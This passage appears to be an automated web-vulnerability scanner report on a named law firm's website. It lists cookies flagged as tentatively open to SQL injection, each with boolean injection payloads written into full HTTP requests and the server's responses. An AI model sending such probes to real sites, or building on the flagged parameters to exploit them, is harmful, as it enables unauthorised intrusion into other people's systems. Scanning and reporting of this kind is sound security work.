<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...

1.12. http://www.pillsburylaw.com/ [CFTOKEN cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 14379774%20or%201%3d1--%20 and 14379774%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898814379774%20or%201%3d1--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Wed, 12-May-2010 19:51:18 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898814379774%20or%201%3d2--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11825844;path=/
Set-Cookie: CFTOKEN=79486011;path=/
Date: Thu, 12 May 2011 19:51:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...

1.13. http://www.pillsburylaw.com/ [MEDIAUSERID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The MEDIAUSERID cookie appears to be vulnerable to SQL injection attacks. The payloads 75248224'%20or%201%3d1--%20 and 75248224'%20or%201%3d2--%20 were each submitted in the MEDIAUSERID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=75248224'%20or%201%3d1--%20; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERID=;expires=Wed, 12-May-2010 19:51:48 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=75248224'%20or%201%3d2--%20; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 19:51:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...

1.14. http://www.pillsburylaw.com/ [MEDIAUSERNAME cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The MEDIAUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 99881169'%20or%201%3d1--%20 and 99881169'%20or%201%3d2--%20 were each submitted in the MEDIAUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=99881169'%20or%201%3d1--%20; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERNAME=;expires=Wed, 12-May-2010 19:51:56 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=99881169'%20or%201%3d2--%20; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 19:51:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...

1.15. http://www.pillsburylaw.com/ [PCONNECTID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The PCONNECTID cookie appears to be vulnerable to SQL injection attacks. The payloads 33124684'%20or%201%3d1--%20 and 33124684'%20or%201%3d2--%20 were each submitted in the PCONNECTID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=33124684'%20or%201%3d1--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCONNECTID=;expires=Wed, 12-May-2010 19:51:25 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=33124684'%20or%201%3d2--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 19:51:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...

1.16. http://www.pillsburylaw.com/ [PCUSERNAME cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The PCUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 16656756'%20or%201%3d1--%20 and 16656756'%20or%201%3d2--%20 were each submitted in the PCUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=16656756'%20or%201%3d1--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:51:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCUSERNAME=;expires=Wed, 12-May-2010 19:51:40 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=16656756'%20or%201%3d2--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 19:51:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

